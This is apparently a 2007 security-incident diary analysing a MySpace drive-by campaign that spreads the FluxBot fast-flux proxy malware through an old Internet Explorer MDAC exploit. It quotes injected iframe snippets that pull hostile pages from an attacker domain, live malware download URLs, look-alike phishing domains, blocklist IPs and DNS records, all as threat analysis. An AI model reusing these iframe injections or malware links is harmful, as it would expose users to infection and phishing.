Last Updated: 2007-06-29 23:14:38 UTC
by Johannes Ullrich (Version: 3)
UPDATE: Skip down to Section 2007-06-28
CAREFUL! This diary contains links to malicious code!
A number of MySpace profiles include drive by exploits. The exploits will install a version of "flux bot", a very popular proxy network bot.
FluxBot (aka "Fast-Flux") is typically used to hide phishing and malware delivery sites behind complex ever changing networks of proxy servers. A system infected with FluxBot will be used a one of these proxies.
Infected MySpace "Friend IDs": 39184135, 171598920, 22057010
A typical excerpt from an infected profile (obfuscated to protect the innocent):
href="http://home. myspace. com. index. cfm. fuseaction.user.MyToken.
<iframe src="http://fafb 4c4c .com/header_03.gif" width=1 height=1></iframe>
The domain used here is of course again served via flux. header_03.gif
<iframe src="http://fafb4c4c .com/routine.php" width=1 height=1></iframe>
Are we there yet? yup. just one more (patched) Internet Explorer exploit to go. The
exploit will install the .exe. For example:
(Warning: live malware URLs visit at your own risk)
http://fafb4c4c .com/session.exe (this is just the downloader stub)
The downloader will now retrieve the actual bot. We have seen among others these
Settings for the bot can be found here:
once its all set and done, you will be a proud new member of the flux net and soon you
will find your system to participate in phishing and similar endevours.
Couple IPs that may be worthwhile to block:
AS13767 | 18.104.22.168
AS15083 | 22.214.171.124
AS25761 | 126.96.36.199
AS25761 | 188.8.131.52
As you can imagine, its a lot of messy work to decode all of this. I am just the messenger. This is work done by members of our great handler team.
MySpace Phish/Drive-by attack vector propagating Fast Flux network growth
Two primary infection vectors have been observed providing us with unique insight into the life cycle involved in propagating a fast flux service network. The attack vectors include:
- Compromised MySpace Member profiles redirecting to phishing sites (this has been discussed here)
- SWF Flash image malicious redirection to Phishing and drive-by browser exploit attempt.
All Flash redirects were observed redirecting browsers to http://www.e44 7aa2.com (****CAREFUL****)
( e447aa2.com is a domain currently serviced by this flux network with wildcard DNS resolution )
(The above URL is only a single example of potentially infinite permutations)
By following the above /da3e/index.php link results in a credible looking MySpace landing page (serviced in flux) with the most interesting footer element displayed below:
The decoded result of /routine.php is an attempt to exploit vulnerable IE client browsers using the Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014) for which Microsoft released a patch in May 2006.
The successful compromise of a windows host via this exploit content results in the download of a malicious downloader stub executable (session.exe) that is then responsible for attempting to download additional malicious components necessary for integration of new compromised hosts into a fast flux service network.
The malware stub (session.exe) above attempts to download and execute the following components:
Now back to these Evil Flash File Redirects:
What follows is just a representative sampling of URLs for imageshack.us site hosted flash files which perform one simple action, an action-script based browser redirect to a fast flux service network hosted combination phishing and drive by exploit that leverages the Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014).
All files are exactly the same based on same md5 and sha1 hash for all files:
Imageshack HTTP Server maintained mtime suggest a deployment time of 2007-06-05 -0700
Decompiling a flash component results in the discovery of that terrible redirect:
Where in the world are Flash files like the above being hosted?
Where in the world are Flash files like the above being hosted?
REMOVED >100 URLS ( You get the idea )
Several Hundred MySpace profiles were discovered injected with links to phishing, and it is easy to imagine that many more were affected.
home.myspace.com.index.cfm.fusea ction.user.mytoken.0c38outb.h5v 17lt.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.0en0r8xd.1155 34a.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.0l3ttn77.oqr hldv.com
HUNDREDS OF URLS REMOVED
home.myspace.com.index.cfm.fusea ction.user.mytoken.1wr4sm8c.lw h gvcq.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.257k51r.uhq0 1o6.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.2dd2l3w6.gcp 8tr9.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.2dp2cvwv.at6 pyss.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.304165k.xt3c gyq.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.3gcri4jk.jk33v 96.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.3kuto9a4.de0 82ak.com
Flux! It's SO easy to miss!
This write up is not geared to address the more complex overview of what a fast flux service network is (but is forthcoming). Essentially all URLs involved in this fast flux service network are served by compromised hosts redirecting their HTTP and DNS traffic to another upstream Mothership host.
;; ANSWER SECTION:
at6pyss.com. 179 IN A 184.108.40.206 [h220.127.116.11.cable.htsp.cablelynx.com]
at6pyss.com. 179 IN A 18.104.22.168 [c-67-161-240-98.hsd1.ut.comcast.net]
at6pyss.com. 179 IN A 22.214.171.124 [c-67-190-48-71.hsd1.co.comcast.net]
at6pyss.com. 179 IN A 126.96.36.199 [adsl-70-241-113-51.dsl.hstntx.swbell.net]
at6pyss.com. 179 IN A 188.8.131.52 [ppp-70-250-117-30.dsl.hstntx.swbell.net]
at6pyss.com. 179 IN A 184.108.40.206 [ppp-71-140-90-107.dsl.frs2ca.pacbell.net]
at6pyss.com. 179 IN A 220.127.116.11 [adsl-71-146-88-77.dsl.pltn13.sbcglobal.net]
at6pyss.com. 179 IN A 18.104.22.168 [adsl-71-146-144-141.dsl.pltn13.sbcglobal.net]
at6pyss.com. 179 IN A 22.214.171.124 [adsl-75-31-235-68.dsl.chcgil.sbcglobal.net]
at6pyss.com. 179 IN A 126.96.36.199 [cpe-76-80-255-40.socal.res.rr.com]
Check back on the above DNS results, the same goes for any domains referenced above.
The concept of Flux may unfold before very your eyes.
at6pyss.com. 172799 IN NS ns1.welcometothechallenge.hk.
at6pyss.com. 172799 IN NS ns1.kanjerida.hk.
at6pyss.com. 172799 IN NS ns1.phudisarida.hk.
at6pyss.com. 172799 IN NS ns1.myheroisyourslove.hk.